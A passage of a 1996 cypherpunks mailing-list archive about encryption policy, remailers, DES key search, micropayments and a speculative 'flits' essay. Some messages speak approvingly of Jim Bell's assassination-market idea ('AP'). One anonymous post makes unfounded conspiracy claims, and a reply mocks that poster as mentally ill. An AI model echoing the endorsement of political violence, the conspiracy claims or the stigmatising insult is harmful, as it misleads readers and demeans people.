will be up to the courts to decide whether the escrow system is a "back
door" or not.


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Lewine <alewine@dcez.com>
Date: Mon, 24 Jun 1996 06:37:36 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Oil Change software snoops through hard drive
In-Reply-To: <adf03dbc080210043817@[205.199.118.202]>
Message-ID: <31CDA9A3.1302@dcez.com>
MIME-Version: 1.0
Content-Type: text/plain


<<I wrote:
>But this isn't MS's RegWiz. It's capabilities sound much greater, and
>it's not clear how to opt out, etc. >>Tim May replied:
<<Not buying it and not installing it would appear to be an easy way to 
"opt out.">>
Maybe i'm confused, but oil change sounds like a mole that can burrow 
unbidden into user's disks. I don't think user installation is required, 
or else it will auto install the user code on installation of whatever 
software has licensed it.
Alan L
http://www.dcez.com/~alewine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Andrew <bandrew@potlatch.esd112.wednet.edu>
Date: Mon, 24 Jun 1996 09:14:31 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <31CDACD4.751@potlatch.esd112.wednet.edu>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Murchison <76711.2023@compuserve.com>
Date: Mon, 24 Jun 1996 06:49:44 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Sign me up
Message-ID: <960623175822_76711.2023_FHD45-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


Please post me on the mailing lists.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 24 Jun 1996 07:09:13 +0800
To: jimbell@pacifier.com>
Subject: Re: L&J: Libertarians
Message-ID: <9606231806.AA25084@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 22 Jun 96 at 18:56, jim bell wrote:


> In practice, I think we'll discover we don't NEED politicians at
> all!  

I was having a discussion with a retired physics dept director the
other day.  He never heard of AP and we did not discuss it.  But we
discussed the Net a lot.  And he made a very fundamental remark.  He
said someting along thoses lines (not an exact quote but one that sums
it up in essence) :

"It is amazing how the Net is.  It is a total anarchy and yet, it
seems to work *perfectly* well without any central decision making
authority.  Actually, no central authority could ever make it happens
better than this actual anarchy led by self-interest on the part of
each individuals each owning a tiny piece of the network."

It make me think about how essential the govt is, and especially in
the field of economy...


> Sure, there are some people who scoff, 
> but I think they're just displaying sour grapes.  They're so used to
> the current system, they want to "fix" it with half-measures rather
> than really eliminating the problems.

Some peoples have a vested interest in maintaining the system as it
is.  For example, take here in Canada, progressive tax rates / a flat
income tax.  If a flat income tax rate would be put in place, just
think of how many chartered accountant would be jobless overnight...


> That's exactly the kind of discussion I want to have, on the 'net. 
> It turns

> out, however, that many if not most of the people who "get" this
> idea, are satisfied that it'll work, and don't seem to see the need
> for discussion of the details.

Anybody who discuss it openly on the net and plan to implement it will
get killed by governments (pick your favorite one).  I find it very
unlikely that all e-mail on the topic is not monitored, just as
anything having my name, or Jim Bell's or anybody else that ever
discussed the topic.  Even peoples who apparently seemed to denigrate
AP, like Unicorn, will be suspected since they'll reason that he might
have a secret wish to implement it while opposing it publicly.  Just
like mole get to the highest rank in the organization they want to
undermine.  That is the *nature* of any security oriented
organization.  

And communicating with each other with PGP without remailers would
probably put us instantly on a hit list.  To quote a famous french
comic strip " when in doubt, it's better to hang..." .  The best
protection is either a long chain of remailer or to post *everything*
publicly on C'Punks *AND* several newsgroups at the same time.  Then,
again, they might make "examples", helped by a scare publicity
campaign by the mass medias.  

Wake up to it guys, if ever such a system gets implemented, it will be
a major war and govt will use every allies they might have (mainly,
the conventional mass-medias) to eradicate it.  The war will be fought
underground but it will be savage, as all wars are.

I don't think that you will ever succeed to "educate" a sufficient
part of the public to make things work as you figured.  The net
population represent a minuscule fraction of the population and most
net surfers don't even care.  C'Punks has a total cumulative
subscription of, say, 10000 (out of the blue number), which represent
(at 40E6 internet users) around 2.5 percent of 1 percent of all net
users.

Many individuals consider that it is better to get taxed to 50% and
keep 100% of their life...

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Verify/Decrypt with PGP v2.6 or later.

iQEVAgUBMc0L5ciycyXFit0NAQHFjggAiWQUV0YudQPHq1Q7Y8zkv64PicePiyoX
MEBOfseSx6SEiSoB0N/JY3FBZYOEa6QYfYiNr/FBSWjyPVEuxQcJc3SBQ354lFOQ
ZqiQnR6TrjzxZo0Z+NaVYI2Ys+G5ykOGW45NElF5TRyk0YjK1HI/dlS7UpD9Li1E
+xMtJo8x+/joWYEc45ABIHg0DUAJWe4MG7AEcmde4veOcyC/yMi1gy+2QLMARyZ/
VbTfhJ+V1D5zwBTNVQCtcIOJMeXmMDeBy6gkBRlaYP5r6az+uQa6AKfo78Y3f1eQ
P6XZWuGeWLPvdIeq+FTwWvULdfPkZ4xJtaCIJC03gOgBmXsuWNmy8Q==
=Yovo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 24 Jun 1996 02:11:14 +0800
To: cypherpunks@toad.com
Subject: FISA Mock
Message-ID: <199606231409.OAA02886@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-23-96. WaPo Mag cover story: 
 
   "Secret Intrusions" 
 
      Government surveillance, terrorism and the U.S. 
      Constitution: The story of a Washington Courtroom no 
      tourist can visit. 
 
      Last year, a secret court in the Justice Department 
      authorized a record 697 'national security' wiretaps on 
      American soil, outside normal constitutional procedures. 
      Is the world growing more dangerous -- or has Big 
      Brother found a way around the Foruth amendment. 
 
   A revealing report on burgeoning FISA wiretap intrusions, 
   featuring FBI, NSA, CIA, Freeh, Kallstrom, Gorelick and 
   little-known Mary Lawton who, before her death, guaranteed 
   the incorruptibility of FISA: "In the modern age of 
   intelligence gathering and federal law enforcement, no one 
   was more important to the management of the most critical 
   legal issues binding the two communities." And what has 
   happened without her "gold standard of legality in the 
   world of counterintelligence." 
 
   A wideawake eye-opener to General Reno's sweetsong lullaby  
   at the Commonwealth Club. 
 
   Taken from a book due out next month: "Main Justice," by 
   Jim McGee and Brian Duffy.  
 
   ----- 
 
   http://pwp.usa./pipeline.com/~jya/fismok.txt  (54 kb) 
 
   FIS_mok 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 23 Jun 1996 16:49:49 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: Generation of private key from pass
In-Reply-To: <199606222214.PAA18284@jobe.shell.portal.com>
Message-ID: <199606230457.OAA29221@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> Matt mentioned difficulty in finding a public domain dictionary that had
> parts of speech.  The reason I am posting is because a few weeks ago
> Grady Ward announced that he was making his "Moby Lexicon" available for
> free, and I seem to recall that this included part of speech information.
> If so, this could be an opportunity for someone else to explore this
> method.

Get the Oxford Learner's dictionary.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 24 Jun 1996 02:56:44 +0800
To: cypherpunks@toad.com
Subject: Arsenal Ship Details
Message-ID: <199606231502.PAA05702@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A front-page detailed description of the Navy's latest work on the
remote-controlled Arsenal ship: 
 
 
http://www.washingtonpost.com/wp-srv/WPlate/1996-06/23/100L-062396-idx.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@ACM.ORG>
Date: Mon, 24 Jun 1996 08:34:38 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Federal Key Registration Agency
In-Reply-To: <Pine.3.89.9606201224.B27834-0100000@tesla.cc.uottawa.ca>
Message-ID: <v03006f01adf34c411979@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:20 -0400 6/20/96, Michael Froomkin wrote:
>[...] AG Reno's assertion
>that it would take the government a year to break one DES message with a
>"supercomputer".  She presumably believes this.  We know the number for
>known plaintext attacks, but assuming you don't have a known plaintext,
>what's a more reasonable assumption?

If the plaintext is ASCII text, the time is the same but the machine is a
little more expensive.  What you do is process 8 or more blocks of
ciphertext in parallel, matching the high order bit of each byte to 0.
With 8 blocks, you get 64 high order bits -- more than the number of key
bits -- so you're not likely to guess wrong.

If the signal is audio instead of text, I don't know what you look for.
That depends on the compression algorithm.

If the signal is compressed text, again I would need to see the comressor
output.

If all you have is one or two blocks of text (e.g., a bank transaction) you
decrypt and decide whether the result is just impossible.  If it's possible
(and there will be many) you send the trial key on to a second processor (a
more general one) to try that key on the whole message to decide if the
message is still possible.

If that processor likes a given key, you send the result to a human -- who
chooses among all the possibles.

In other words, this doesn't have to be one-step-to-success.  All you're
doing is pruning the keyspace to something more manageable.

 - Carl


+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme          |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."    |
+-------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 24 Jun 1996 08:58:04 +0800
To: cypherpunks@toad.com
Subject: Auto-mail filters and penet-remiler loophole?
Message-ID: <199606232055.QAA02670@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Hm.

Seems someone sent a message to my frienly-mailer filter using penet 
remailer.  So of course that person will get an anonymized reply, 
thus being able to know what my anon-id there is.

Fortunetly I don't use penet or rely on it for any form of security.

That's one situation where it would be nice to specify in a line 
somewhere *not* to anonymize mail sent through there (a command in 
header saying X-Do-Not-Anonymize maybe?)

Rob.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 24 Jun 1996 13:18:46 +0800
To: blanc <blancw@accessone.com>
Subject: Re: info assembly line, "flits" (long)
In-Reply-To: <01BB6068.3EA6BA80@blancw.accessone.com>
Message-ID: <199606240013.RAA25268@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


well, already I'm forced to elaborate on flits when I was
going to do that in another essay. oh well.

>
>
>Wouldn't this accounting of "flits" require that each of them be =
>assigned a tag?  =20

after more thought, I don't think a flit would only be 0 or 1. 
the flit would have different granularity based on what the system
can afford. we might start out by saying that every document
is one "flit", i.e. that is the basic unit. then when we get
a more powerful computer, the form is broken up into multiple
"flits". finally, when God finally designs the ultimate computer
<g>, we would then let every bit in the universe be considered
a flit that has a location in cyberspace at some time.

>Since this would encompass all the "flits" in cyberspace irrespective of =
>who/where used them, whose "flits" would be counted first, beginning =
>where?  =20

not sure about what you mean by "counting" flits.  the concept
of a flit would be very roughly analogous to something like
what email is today, except that the email would never be 
considered to have a permanent destination. every time you
move the flit, new header lines would be added to the 
history tracking of it. what is remarkable is that this 
paradigm gives you incredible tracking control over information
that is going to be necessary in the future, imho.

>And once one "flit" was attached to a document which was maintained as a =
>permanent structure somewhere in someone's database, that means it could =
>not be used anywhere else, and how would this work for copies made of =
>that original document? =20

the documents and flits are interchangeable. the document does not
have flits "attached", the document *is* a flit, or comprised of flits.

some of the properties of flits: they can be copied, but the 
child flits might "know" who their parents are, and can always
find their parent.  notice how radically different this is from
the modern view of information as lumps that sit in disconnected
piles. when I use a "cp" command, I do indeed get a copy, but I
have no idea about the origination of that copy. the flit concept
establishes *context* to information, and makes the context 
intrinsically part of the information. the information cannot
exist independent of context. today, our computers give us
contextless information, and all the structures we have built
are designed to attach context when it should be attached at
a much lower level, imho.

>Once a "flit" was used as a copy and then detached and re-associated =
>with some other document several times, would each new copy carry a =
>record of where it had been previously, so that half of the amount of =
>space of a document would be comprised of the historical record of where =
>that "flit" had been?

again, it can be implemented at different levels. many companies
already have "revision control systems" that are flit-like mechanisms
working at a document level.

>Sounds very costly.

ah yes. indeed. not saying it can be pulled off this moment.
two words: Moore's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 24 Jun 1996 13:21:47 +0800
To: Josh Sled <jsled@skipjack.cs.berkeley.edu>
Subject: Re: info assembly line, "flits" (long)
In-Reply-To: <Pine.HPP.3.91.960622202438.18527B-100000@skipjack.CS.Berkeley.EDU>
Message-ID: <199606240027.RAA26443@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>think about the the number of atoms that are necessary 
>to hold the information for a single page, let alone an entire book...  

yep. not saying what I am talking about is feasible this moment.
"moore's law"

>in a virtual reality "cyberspace", this would be an insurmountable data 
>storage... on the small-scale.

not insurmountable. quite practical and sensible in say 10 years.

>These are enormously complex 
>tasks, far more so than uuencoding and e-mailing... but we don't 
>recognize it because it's handled for us automagically.

to move a pencil I only pick it up and set it down. to move a 
document through cyberspace, 
the process is infinitely more complex, requiring an
immensity of thoughts and coordinated actions. when we create
a system that matches the real-world difficulty, then we will
be approaching the limit. we are very, very far from that limit
even though we have climbed the ladder a long ways as you note.

>I think the thing that's most important in this sentence is _"move"_ ... 
>this is the main problem for computers... it's SO easy to DUPLICATE 
>information... but near impossible to make sure that you've MOVED it... 

as I was saying, information that is duplicated is contextless by
today's standards.

indeed, the concept of "moving" information implies TIME-- at one
time, it is at one place, at another time, it is in a new place.
but it is the SAME INFO. today, the disconnected idea of a "bit"
does not give you this *continuity*. I make a copy somewhere else
that is not tied to the original document.

>Who says that this doesn't exist today?  The file server which I'm on 
>says that there's a file in my "home directory" on "this" machine 
>(skipjack.cs.berkeley.edu) called index.html... and if I went to the 
>computer next to me, it would say that there's a file on the machine 
>hornet.cs.berkeley.edu of the same name... but in reality the file is 
>somewhere within a block of me on the machine cory.eecs.berkeley.edu... 
>it's the same thing, just with a nice visual metaphor slapped on front.

imagine the same thing on a totally universal cyberspatial level,
not merely within a single company or university. I agree, we have
rudiments of what I'm talking about in place. but my point is
mainly that they are rudiments compared to what is possible. the
web is a very good sample framework for the kind of seamlessness
I'm talking about. like I say, the future information assembly
line will be built on top of it. it has a long ways to go too.

>And key to the flit concept is the moving concept that I alluded to 
>earlier... these flits could only exist if A) you had trusted|responsible 
>software that moved them or B) they could ONLY move... like an atom... 
>you cannot copy and atom... and to pull off what you're talking about... 
>you wouldn't be able to copy a flit.

in a sense, I think the flit concept is a magic bridge between bits
and atoms. bits are too abstract. atoms are too real. flits are
a nice compromise. we have to get our bits to behave more like
atoms: persistence, etc.  there are a whole lot of very nice
"properties" of atoms that are staring us in the face that we
would benefit from immensely implementing in cyberspace.

>It means that you'd have an INSANELY large ammount of storage for a 
>single small document.

early stages would not be much different than RCS systems already in
use in companies.

>If each flit was, say, a single bit in the document... you'd have almost 
>atomic-like storage for a file... each part of each character would have 
>a revision/tracking history...

you could have mechanisms that don't keep the entire history of the
flit. I agree, a flit as a 0 or 1 is very unlikely in the near future.
but at a document level, i.e. a document as a flit, we already have
it in RCS systems that companies are struggling to implement well
as we speak.

>But bits aren't supposed to have context... they're just a state of 
>being... on or off...

I'm saying that in the information assembly line of the future,
they *must* have context. they must be tied together. you only
have disconnected chaos otherwise.

>But how about another approach... instead of the software spitting out 
>a document... it gives back a combination of a document and the spit-out 
>document... listing what's changed: revision control.

again, this requires the human to interpret the changes. what if
there was an actual "link" between the old and the new document
that is "stuck" to the new document? and furthermore, software
could traverse these links? that's more what I have in mind.

>Unfortunately, data IS disconnected... the only thing that makes it 
>connected is what we impose on it by saying that a file stops when the 
>EOF is reached, and in a particular file format, this character means "foo" 
>and that character means "bar", etc... this is what makes data continuous.

data doesn't have to be disconnected. I told you this was a radical
paradigm shift that I was proposing. you obviously have the previous
concepts down quite well. I'm not arguing that what you are saying
is the conventional system. I pointed out exactly that.

>But cyberspace is NOT real space...

it will evolve to become more and more like a real space, a point
of my essay.

>assembly-line = server program
>assembly track = queue based in permenant storage (hard drive, static 
>	ememory, etc)
>machine breaks, assembly-line program dies... machine comes back up... 
>assembly-line program starts... continues to process queue on permemant 
>storage... difference?

you have a rough analogy going. the point is that in a real cyberspace,
bits would never disappear like they do when computers go
down. we can create such a system.

>VERY VERY VERY far...

10 years or so, I would say, before people implement things that
sound like they came right out of what I was talking about.

>Well.. that's what i'm saying : "It'll take too much time".  But, 
>considering Moore's law... you may be right... in a universe with 
>"virtually unlimited" computing power, this, and a lot more, would be 
>possible...

right. I think it is much more realistic to speculate that we will
be virtually unlimited than limited, and to ask the question, 
what would we implement if we truly were unlimited? to build something
limited when you are unlimited shows an impoverished imagination.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Franklin Wayne Poley <fwp@vcn.bc.ca>
Date: Mon, 24 Jun 1996 14:58:31 +0800
To: liberty-and-justice@pobox.com
Subject: Re: L&J: Libertarians
In-Reply-To: <9606231806.AA25084@cti02.citenet.net>
Message-ID: <Pine.3.89.9606231725.A9151-0100000@opus.vcn.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 23 Jun 1996, Jean-Francois Avon wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On 22 Jun 96 at 18:56, jim bell wrote:
> 
> 
> > In practice, I think we'll discover we don't NEED politicians at
> > all!  
> 
> I was having a discussion with a retired physics dept director the
> other day.  He never heard of AP and we did not discuss it.  But we
> discussed the Net a lot.  And he made a very fundamental remark.  He
> said someting along thoses lines (not an exact quote but one that sums
> it up in essence) :
> 
> "It is amazing how the Net is.  It is a total anarchy and yet, it
> seems to work *perfectly* well without any central decision making
> authority.  Actually, no central authority could ever make it happens
> better than this actual anarchy led by self-interest on the part of
> each individuals each owning a tiny piece of the network."
> 
> It make me think about how essential the govt is, and especially in
> the field of economy...
> 
I think we need public administrators (not politicians) who are hired by 
the people for the people to do specific jobs, like looking after roads, 
public buildings etc. and the public administrators who don't do their 
jobs well are fired (not assassinated) like any other employee.... FWP.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 24 Jun 1996 13:32:34 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.25 - Senate Encrypti
Message-ID: <199606240104.SAA29097@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


WHY IS NO ONE TALKING ABOUT THIS VIOLATION OF OUR RIGHTS? EVER HERE THAT
IN THE US VOTES ARE supposed to be *****SECRET*****??? NO MORE!

Why does the vtw cdt etc want to hand over your name to the us gov? Notice
how there's two events one on the east cost and the other on the west coast.
Why is that? So they can get more names!

Read carefully:

>TELL CONGRESS WHY ENCRYPTION IS IMPORTANT TO YOU - ADD YOUR VOICE TO THE
>CONGRESSIONAL RECORD
>
>Senator Burns, Senator Patrick Leahy (D-VT) and the other sponosors of the
>Pro-CODE bill want to hear from the Net.community about why encryption is
>important to privacy and security on the Internet.
>
>Please be sure to visit http://www.crypto.com/ and add your voice to the
>debate over encryption policy on Capitol Hill.  Responses will be tabulated
>and the results, along with selected statements, will be included in the
>Congressional Record by Senator Conrad Burns.  The restults will also be
>featured during the Security and Freedom through Encryption Forum (SAFE) on
>July 1 (details on that event are attached below).
>
>To add your voice to the crypto debate in Congress, visit:
>
>   http://www.crypto.com/submit/
>

Right. Sure. And then they have a record of all the ppl interested in
cryptoprivacy (keep reading)

>ATTEND THE SAFE FORUM - JULY 1, 1996 STANFORD CALIFORNIA
>
>On July 1, 1996, in the heart of California's Silicon Valley at Stanford
>University, members of Congress, prominent computer industry leaders and
>privacy advocates will meet to discuss the need to reform U.S. encryption
>policy.
>
>The event is FREE and open to the public, but space is limited and is going
>fast.  To find out more, and to reserve your free ticket, visit the SAFE
>Forum Web Page at:
>
>  http://www.crypto.com/safe/
>

And sign up for a free trip to the roundup of people who want privacy. Coming
soon to a police state near you. WHY THE FUCK DO THEY NEED TO KNOW YOUR
NAME FOR THIS SHIT??? WHY IS NO ONE ASKING THIS???

Look carefully at who's sponsoring this. Who are they, and where does
the money come from? Hint: three letters.

Notice how they don't use PGP to sign the msg? Wonder why? What does PRZ
say about this?

Is there anyone we trust involved who can answer for this?

[///// THIS LINE ADDED BY EZBBS-MAIL / DO NOT DELETE / MSGID-33f1a9 / END /////]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 24 Jun 1996 13:40:35 +0800
To: cypherpunks@toad.com
Subject: Re: unsuscribe
Message-ID: <199606240104.SAA29186@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


naim@micronet.fr writes:
 > unsuscribe

     Hmm, the clueless list is no longer available at c2.  Pity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 24 Jun 1996 14:04:33 +0800
To: Franklin Wayne Poley <liberty-and-justice@pobox.com
Subject: Re: L&J: Libertarians
Message-ID: <199606240129.SAA04282@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:35 PM 6/23/96 -0700, Franklin Wayne Poley wrote:
>On Sun, 23 Jun 1996, Jean-Francois Avon wrote:

>> On 22 Jun 96 at 18:56, jim bell wrote:
>> 
>> 
>> > In practice, I think we'll discover we don't NEED politicians at
>> > all!  
>> 
>> I was having a discussion with a retired physics dept director the
>> other day.  He never heard of AP and we did not discuss it.  But we
>> discussed the Net a lot.  And he made a very fundamental remark.  He
>> said someting along thoses lines (not an exact quote but one that sums
>> it up in essence) :
>> 
>> "It is amazing how the Net is.  It is a total anarchy and yet, it
>> seems to work *perfectly* well without any central decision making
>> authority.  Actually, no central authority could ever make it happens
>> better than this actual anarchy led by self-interest on the part of
>> each individuals each owning a tiny piece of the network."
>> 
>> It make me think about how essential the govt is, and especially in
>> the field of economy...
>> 
>I think we need public administrators (not politicians) who are hired by 
>the people for the people to do specific jobs, like looking after roads, 
>public buildings etc. and the public administrators who don't do their 
>jobs well are fired (not assassinated) like any other employee.... FWP.


Privatization will occur.  People will, indeed, be hired to do the tasks you describe.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 24 Jun 1996 13:08:02 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Auto-mail filters and penet-remiler loophole?
In-Reply-To: <199606232055.QAA02670@unix.asb.com>
Message-ID: <Pine.LNX.3.94.960623203411.135A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 23 Jun 1996, Deranged Mutant wrote:

> Hm.
> 
> Seems someone sent a message to my frienly-mailer filter using penet 
> remailer.  So of course that person will get an anonymized reply, 
> thus being able to know what my anon-id there is.
> 
> Fortunetly I don't use penet or rely on it for any form of security.
> 
> That's one situation where it would be nice to specify in a line 
> somewhere *not* to anonymize mail sent through there (a command in 
> header saying X-Do-Not-Anonymize maybe?)

Non-anonymous mail can already be sent through penet by sending the message
to na[anon id] instead of an[anon id].  The problem you describe with your
mail filter also exists for mailing lists and other instances where a person
obliviously sends e-mail to an anonymous id.  Unfortunately, other
double-blind, pseudonymous remailers have the same problem.  The only way to
solve the problem is to not have remailers enable a double-blind by default
(or conversely, have all mail programs rearrange the address so the reply is
sent non-anonymously).

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMc3kJ7Zc+sv5siulAQHm+QP/XhK9YdV2uSbady21ekMe4j//YzDDR32w
fvwwgZntjCQ7mP9thJzMxIziZ+RlA/DiXFf7A+eUieF+Tqbn4gyCh2/InQWrwssK
l7Qh5ZC9OuSCJZnbwlCi+G/XfLAO+OdskoiTkW3YYlz2YO5KRAKhCBJwzIDPiWNh
AIrN19vyI9k=
=gyEu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 24 Jun 1996 17:00:42 +0800
To: cypherpunks@toad.com
Subject: One more reason to bash encrypt policy.
Message-ID: <199606240423.VAA13899@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Tonight, on the CBS show "60 minutes", we saw as the first portion the story 
of Carlos Salinas, the ex-president of Mexico, and his brother Raul, who 
managed to acquire $300 million despite the fact that his legitimate income 
never exceeded $190,000 in any year.  Well, Raul's in jail now, and his 
probably-crooked brother is in self-imposed exile (escape?) in Ireland.

Okay, you ask, is this relevant to Cypherpunks?  Sure!  The government's 
wanting to maintain an encryption policy to ensure that it is capable of 
reading encrypted traffic, right?  Well, the Bush and Clinton administration 
signed NAFTA with Mexico when it was run by a crook.  Where was the CIA?  
The NSA?  Raul's money went through Citibank.  Where's the FBI?  Isn't that 
one of the reasons we have such agencies?  Or is corruption among family 
members of the Presidend an old and established practice?  (Cattle futures?  
Sounds like a lotta bull to me!)
  
Why wasn't this stuff revealed by the US government?  Did it consider this 
corruption a failure?   Or a SUCCESS?  If we can't trust the US government 
to keep us from dealing with sleazy government's like Mexico, and exposing 
them, then why are we signing long-term trade agreements with them?  How 
much of Raul's money was due to NAFTA, for example?

Anyway, I think here's yet another reason to reject any kind of "National 
Crypto Policy" that's claimed to allow the government to snoop:  Clearly, 
they can't even be trusted to do the right thing with their information when 
they don't have to decrypt it.  I sure as hell am not going to expect 
them to do any better in the future.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 24 Jun 1996 14:13:11 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: CDT Policy Post 2.25 - Senate Encrypti
In-Reply-To: <199606240104.SAA29097@jobe.shell.portal.com>
Message-ID: <199606240146.VAA08155@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> WHY IS NO ONE TALKING ABOUT THIS VIOLATION OF OUR RIGHTS? EVER HERE THAT
> IN THE US VOTES ARE supposed to be *****SECRET*****??? NO MORE!
> 
> Why does the vtw cdt etc want to hand over your name to the us gov? Notice
> how there's two events one on the east cost and the other on the west coast.
> Why is that? So they can get more names!

Does your doctor know you've gone off your meds? Do that for long and
the guys in white coats will come for you again, you know.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Rarey <Paul.Rarey@Clorox.com>
Date: Tue, 25 Jun 1996 13:25:43 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Micropayments: myth?
In-Reply-To: <1cceeb10@ix.netcom.com>
Message-ID: <960624042346.ZM14774@maverick.clorox.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jun 23,  0:16, Bill Stewart wrote:
> Subject: Re: Micropayments: myth?
>>>don't people get this? with microcurrency, you don't say to a 
>>>seller, "bill me for this item". it would rarely work like that at
>>>all. instead, it is, "here is my money, please give me the item". 
>>
>>What is the authentication process for the "money" your are "giving" in this 
>>scenario?
>
>Varies with the micropayment system.  Some proposals are to use Digicash,
>either online or offline.  Others are to use simpler systems, such as S/Key 
>variants or piles of tokens - you'd use some heavyweight payment system like
>a credit card / ATM / digicash to buy 100 or 1000 microtokens, which you'd
>use for the actual payments, and which would require less computation to
>authenticate.

These processes have a non-repudiation service?

Cheers!
[ psr ]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh Sled" <jsled@cory.EECS.Berkeley.EDU>
Date: Tue, 25 Jun 1996 14:15:44 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: info assembly line, "flits" (long)
Message-ID: <199606241741.KAA10522@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 23 Jun 96 17:27:25 -0700, Vladimir Z. Nuri wrote:

>>think about the the number of atoms that are necessary 
>>to hold the information for a single page, let alone an entire book...  
>
>yep. not saying what I am talking about is feasible this moment.
>"moore's law"

But I don't think that it's feasible at ANY point in the near future...
in fact, I think a better question is WHY?  What would we use this
newfound ability for?  

>>in a virtual reality "cyberspace", this would be an insurmountable data 
>>storage... on the small-scale.
>
>not insurmountable. quite practical and sensible in say 10 years.

Ok... maybe practical to store the data... but I don't think sensible. 
Think: if we had this ability with atoms, what would we use it for? 
Maybe tracking crimes... or political prisoners (where have the atoms
in this anonymous leaflet spelling out steps for rebellion come from?)
or just curiousity... sure, there are justifable uses, but does the
"savings outweigh the cost", so to speak?

>to move a pencil I only pick it up and set it down. to move a 
>document through cyberspace, 
>the process is infinitely more complex, requiring an
>immensity of thoughts and coordinated actions. when we create
>a system that matches the real-world difficulty, then we will
>be approaching the limit. we are very, very far from that limit
>even though we have climbed the ladder a long ways as you note.

